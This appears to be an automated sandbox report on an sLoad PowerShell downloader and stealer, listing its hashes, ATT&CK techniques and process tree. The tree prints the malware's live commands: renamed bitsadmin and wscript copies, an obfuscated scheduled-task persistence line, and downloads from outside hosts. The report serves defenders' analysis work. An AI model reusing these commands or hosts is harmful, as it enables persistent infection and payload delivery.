sload | c6107c4569196a4c240da6ab73e259556e39f68a7d83330c34550ac8a43f35d9

Analysis

max time kernel
120s
max time network
121s
platform
windows7_x64
resource
win7-20240220-en
resource tags

arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
submitted
18-06-2024 12:46

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

bc01ff54189a4d4014484b181624dbeb_JaffaCakes118.ps1
Size

116KB
MD5

bc01ff54189a4d4014484b181624dbeb
SHA1

3ec09b8075462565e158df0e50fb2faf8628e792
SHA256

c6107c4569196a4c240da6ab73e259556e39f68a7d83330c34550ac8a43f35d9
SHA512

27b42bbd5bf403b8c18a0828a4a1c26a051ae6e150e66ddd2b1afa16d4ed4cae35aebe5792ecc8aead27d8b23da759c5babf8a1936185b684086662734df41f1
SSDEEP

3072:7ZiyX09E8J3fWruXqnhi89T/H5GPuffVN5LIdW:7zX09E8FfWruXqnhi89T/ZGPwdN5LIdW

Score

10^/10

sload execution stealer trojan

Malware Config

Signatures

sLoad
sLoad is a PowerShell downloader that can exfiltrate system information and deliver additional payloads.
trojan stealer sload

Executes dropped EXE 4 IoCs

pid	Process
1796	FeamFbE.exe
2056	CCJHbh.exe
1456	CCJHbh.exe
1508	CCJHbh.exe

Loads dropped DLL 1 IoCs

pid	Process
2896	cmd.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1708	powershell.exe
2776	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2584	schtasks.exe

Suspicious behavior: EnumeratesProcesses 13 IoCs

pid	Process
1708	powershell.exe
1708	powershell.exe
1708	powershell.exe
1708	powershell.exe
2776	powershell.exe
2776	powershell.exe
2776	powershell.exe
2776	powershell.exe
2776	powershell.exe
2776	powershell.exe
2776	powershell.exe
2776	powershell.exe
2776	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	1708	powershell.exe
Token: SeDebugPrivilege	2776	powershell.exe

Suspicious use of WriteProcessMemory 51 IoCs

description	pid	Process	procid_target
PID 1708 wrote to memory of 2164	1708	powershell.exe	29
PID 1708 wrote to memory of 2164	1708	powershell.exe	29
PID 1708 wrote to memory of 2164	1708	powershell.exe	29
PID 1708 wrote to memory of 2600	1708	powershell.exe	30
PID 1708 wrote to memory of 2600	1708	powershell.exe	30
PID 1708 wrote to memory of 2600	1708	powershell.exe	30
PID 1708 wrote to memory of 2224	1708	powershell.exe	31
PID 1708 wrote to memory of 2224	1708	powershell.exe	31
PID 1708 wrote to memory of 2224	1708	powershell.exe	31
PID 1708 wrote to memory of 2692	1708	powershell.exe	32
PID 1708 wrote to memory of 2692	1708	powershell.exe	32
PID 1708 wrote to memory of 2692	1708	powershell.exe	32
PID 2692 wrote to memory of 2584	2692	cmd.exe	34
PID 2692 wrote to memory of 2584	2692	cmd.exe	34
PID 2692 wrote to memory of 2584	2692	cmd.exe	34
PID 2408 wrote to memory of 1796	2408	taskeng.exe	38
PID 2408 wrote to memory of 1796	2408	taskeng.exe	38
PID 2408 wrote to memory of 1796	2408	taskeng.exe	38
PID 2408 wrote to memory of 1796	2408	taskeng.exe	38
PID 1796 wrote to memory of 2776	1796	FeamFbE.exe	39
PID 1796 wrote to memory of 2776	1796	FeamFbE.exe	39
PID 1796 wrote to memory of 2776	1796	FeamFbE.exe	39
PID 1796 wrote to memory of 2776	1796	FeamFbE.exe	39
PID 2776 wrote to memory of 2752	2776	powershell.exe	41
PID 2776 wrote to memory of 2752	2776	powershell.exe	41
PID 2776 wrote to memory of 2752	2776	powershell.exe	41
PID 2776 wrote to memory of 2752	2776	powershell.exe	41
PID 2776 wrote to memory of 2556	2776	powershell.exe	44
PID 2776 wrote to memory of 2556	2776	powershell.exe	44
PID 2776 wrote to memory of 2556	2776	powershell.exe	44
PID 2776 wrote to memory of 2556	2776	powershell.exe	44
PID 2776 wrote to memory of 2896	2776	powershell.exe	46
PID 2776 wrote to memory of 2896	2776	powershell.exe	46
PID 2776 wrote to memory of 2896	2776	powershell.exe	46
PID 2776 wrote to memory of 2896	2776	powershell.exe	46
PID 2896 wrote to memory of 2056	2896	cmd.exe	48
PID 2896 wrote to memory of 2056	2896	cmd.exe	48
PID 2896 wrote to memory of 2056	2896	cmd.exe	48
PID 2896 wrote to memory of 2056	2896	cmd.exe	48
PID 2556 wrote to memory of 1456	2556	cmd.exe	49
PID 2556 wrote to memory of 1456	2556	cmd.exe	49
PID 2556 wrote to memory of 1456	2556	cmd.exe	49
PID 2556 wrote to memory of 1456	2556	cmd.exe	49
PID 2776 wrote to memory of 1504	2776	powershell.exe	50
PID 2776 wrote to memory of 1504	2776	powershell.exe	50
PID 2776 wrote to memory of 1504	2776	powershell.exe	50
PID 2776 wrote to memory of 1504	2776	powershell.exe	50
PID 1504 wrote to memory of 1508	1504	cmd.exe	52
PID 1504 wrote to memory of 1508	1504	cmd.exe	52
PID 1504 wrote to memory of 1508	1504	cmd.exe	52
PID 1504 wrote to memory of 1508	1504	cmd.exe	52

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -ExecutionPolicy bypass -File C:\Users\Admin\AppData\Local\Temp\bc01ff54189a4d4014484b181624dbeb_JaffaCakes118.ps1
1⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1708
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c copy /Z c:\Windows\SysWOW64\bitsadmin.exe CCJHbh.exe"
  2⤵
  PID:2164
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" "/c copy /Z c:\Windows\SysWOW64\wscript.exe FeamFbE.exe"
  2⤵
  PID:2600
- C:\Windows\system32\schtasks.exe
  "C:\Windows\system32\schtasks.exe" /query /FO CSV /v
  2⤵
  PID:2224
- C:\Windows\system32\cmd.exe
  "C:\Windows\system32\cmd.exe" /C schtasks /F /%windir:~0,1%reate /sc minute /mo 3 /TN "S0shmGCSNMP" /ST 07:00 /TR "c:\users\Admin\AppData\Roaming\\shmGCSNMP\FeamFbE.exe /E:vbscript c:\users\Admin\AppData\Roaming\\shmGCSNMP\YMTgAJQo.tmp"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2692
- - C:\Windows\system32\schtasks.exe
    schtasks /F /Create /sc minute /mo 3 /TN "S0shmGCSNMP" /ST 07:00 /TR "c:\users\Admin\AppData\Roaming\\shmGCSNMP\FeamFbE.exe /E:vbscript c:\users\Admin\AppData\Roaming\\shmGCSNMP\YMTgAJQo.tmp"
    3⤵
    - Scheduled Task/Job: Scheduled Task
    PID:2584

C:\Windows\system32\taskeng.exe
taskeng.exe {6E4222B0-3151-454D-AF9E-C912DD9C97E1} S-1-5-21-2721934792-624042501-2768869379-1000:BISMIZHX\Admin:Interactive:[1]
1⤵
- Suspicious use of WriteProcessMemory
PID:2408
- \??\c:\users\Admin\AppData\Roaming\shmGCSNMP\FeamFbE.exe
  c:\users\Admin\AppData\Roaming\\shmGCSNMP\FeamFbE.exe /E:vbscript c:\users\Admin\AppData\Roaming\\shmGCSNMP\YMTgAJQo.tmp
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1796
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -file YMTgAJQo.ps1
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2776
  - - C:\Windows\SysWOW64\getmac.exe
      "C:\Windows\system32\getmac.exe" /fo table
      4⤵
      PID:2752
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C C:\users\Admin\AppData\Roaming\shmGCSNMP\CCJHbh.exe /reset
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2556
    - - C:\users\Admin\AppData\Roaming\shmGCSNMP\CCJHbh.exe
        
        C:\users\Admin\AppData\Roaming\shmGCSNMP\CCJHbh.exe /reset
        5⤵
        Executes dropped EXE
        
        PID:1456
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C C:\users\Admin\AppData\Roaming\shmGCSNMP\CCJHbh.exe /transfer cgBMVQSZ /%windir:~6,1%ownload /priority FOREGROUND "https://neawsd.eu/topic//main.php?ch=1&i=c277d82005826048d76b43926d289f13" C:\users\Admin\AppData\Roaming\shmGCSNMP\0_smss.log
      4⤵
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:2896
    - - C:\users\Admin\AppData\Roaming\shmGCSNMP\CCJHbh.exe
        
        C:\users\Admin\AppData\Roaming\shmGCSNMP\CCJHbh.exe /transfer cgBMVQSZ /download /priority FOREGROUND "https://neawsd.eu/topic//main.php?ch=1&i=c277d82005826048d76b43926d289f13" C:\users\Admin\AppData\Roaming\shmGCSNMP\0_smss.log
        5⤵
        Executes dropped EXE
        
        PID:2056
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\system32\cmd.exe" /C C:\users\Admin\AppData\Roaming\shmGCSNMP\CCJHbh.exe /transfer mNQJPbgV /%windir:~6,1%ownload /priority FOREGROUND "https://pivpot.eu/topic//main.php?ch=1&i=c277d82005826048d76b43926d289f13" C:\users\Admin\AppData\Roaming\shmGCSNMP\1_smss.log
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1504
    - - C:\users\Admin\AppData\Roaming\shmGCSNMP\CCJHbh.exe
        
        C:\users\Admin\AppData\Roaming\shmGCSNMP\CCJHbh.exe /transfer mNQJPbgV /download /priority FOREGROUND "https://pivpot.eu/topic//main.php?ch=1&i=c277d82005826048d76b43926d289f13" C:\users\Admin\AppData\Roaming\shmGCSNMP\1_smss.log
        5⤵
        Executes dropped EXE
        
        PID:1508

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SP8MHDC3CRW0GHQX0BP8.temp

Filesize
7KB

MD5
23785cc3c91f4ff06b7b080412e31d2f

SHA1
ebeacd30544954bdb368f94f0882ecfa23e89e55

SHA256
1b615072bc8ee6f19bf2f2a328a3c70a2bf7c98be35a57f22bc584126f912b0b

SHA512
c86c665d58787651a085d20ad62c9a8d77a8dd691c5f33f65f68d065a62544e84be599219454b7bac8685f9d718bfa866b4407b7dad3e0d397b300dc56c34025

Download Submit
C:\users\Admin\AppData\Roaming\shmGCSNMP\YMTgAJQo.ps1

Filesize
1KB

MD5
3b6496d11c7d0e7faf728c1543349d48

SHA1
82b148ae63da14e740a6969a427e593086cb3ba7

SHA256
7a4d4349f4cd5db47bc43d6ab8dacec93b7caf873b802a4329c0051538ff5d89

SHA512
1f0c68afa48ccc09a5bcbc23da7df7ab606eef3b711f0c5e1515c64240cf86302f4d0a16c2ae77edbc0a8f9c3c686be1fae2d794c7e248a3aa2ba374d91d933f

Download Submit
C:\users\Admin\AppData\Roaming\shmGCSNMP\system.ini

Filesize
172KB

MD5
53886a292f2b5df5dd3e3bc5ddc685e5

SHA1
251cdb78aaac399be30fe7ac5fbac2aedcc1dd40

SHA256
a733ae00f7bff9d41f57119abbae3b6fd447f86e260657373dad40cced1bddc1

SHA512
b80a86abcd02f2e346612fac502b366e9dea7c9d069a474f0fa9c77b0fd16243649eb3469287d707664008d3a216058af2694735afb53cbd27f205c75d97e435

Download Submit
C:\users\Admin\AppData\Roaming\shmGCSNMP\win.ini

Filesize
1KB

MD5
68d2f04da656649d327ad9f6d01caf1d

SHA1
5c8adf96fbf3b2ed90ef0e69cfb96bfd9b8b2cea

SHA256
d749e0d96da5ed0dbc144cad503bc38adf8724231094fa0745a407b2755593fa

SHA512
0968b21c8dcf2beefef2b11cc4ae8df9da484b106c01cf2a379f8dbf5a393704d6a30bf42efd48799a3b7a453653bd20496cf73059a697b1eb6f51efec246721

Download Submit
\??\c:\users\Admin\AppData\Roaming\shmGCSNMP\FeamFbE.exe

Filesize
138KB

MD5
d1ab72db2bedd2f255d35da3da0d4b16

SHA1
860265276b29b42b8c4b077e5c651def9c81b6e9

SHA256
047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0

SHA512
b46830742eebc85e731c14f7dc72cc6734fcc79aab46f6080c95589c438c4cca0a069027badc0a8a78e4deeb31cdf38df3d63db679b793212a32efdad7bb8185

Download Submit
\??\c:\users\Admin\AppData\Roaming\shmGCSNMP\YMTgAJQo.tmp

Filesize
1KB

MD5
8892d6f5aa09c6aeee062fe3fe2d2832

SHA1
028b22990fc06c8031fcd797a8127629f5e4256e

SHA256
cd77b0104c4f7bbeaa23c0676d765aa7e787f7e39325aa8b77d4b8ae748f7fa4

SHA512
a0dc7ee4e45adb935535ccae58ac761c4b5ede87ec76a479437ecfcd55ca481c5f0e222996812898b1182a9a622dec9703b883ff7db4483bd9cd84d6f0dc28e8

Download Submit
\Users\Admin\AppData\Roaming\shmGCSNMP\CCJHbh.exe

Filesize
182KB

MD5
0920b14aa67a8b04acf48ffe7c6f0927

SHA1
3421124253058dc21453ebac531b67aeb999f627

SHA256
838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00

SHA512
2b0a9800736cb27316be5e376842bce59ce08089046aaef930da837eb59d1c084106ce447320346911c6fa3c8a32e4e41209b12bb868ac2cd9848d69a9adbe51

Download Submit
memory/1708-6-0x0000000000560000-0x0000000000568000-memory.dmp

Filesize
32KB

Download
memory/1708-20-0x000007FEF51A0000-0x000007FEF5B3D000-memory.dmp

Filesize
9.6MB

Download
memory/1708-11-0x000007FEF51A0000-0x000007FEF5B3D000-memory.dmp

Filesize
9.6MB

Download
memory/1708-10-0x000007FEF51A0000-0x000007FEF5B3D000-memory.dmp

Filesize
9.6MB

Download
memory/1708-9-0x000007FEF51A0000-0x000007FEF5B3D000-memory.dmp

Filesize
9.6MB

Download
memory/1708-4-0x000007FEF545E000-0x000007FEF545F000-memory.dmp

Filesize
4KB

Download
memory/1708-8-0x000007FEF51A0000-0x000007FEF5B3D000-memory.dmp

Filesize
9.6MB

Download
memory/1708-7-0x000007FEF51A0000-0x000007FEF5B3D000-memory.dmp

Filesize
9.6MB

Download
memory/1708-5-0x000000001B6F0000-0x000000001B9D2000-memory.dmp

Filesize
2.9MB

Download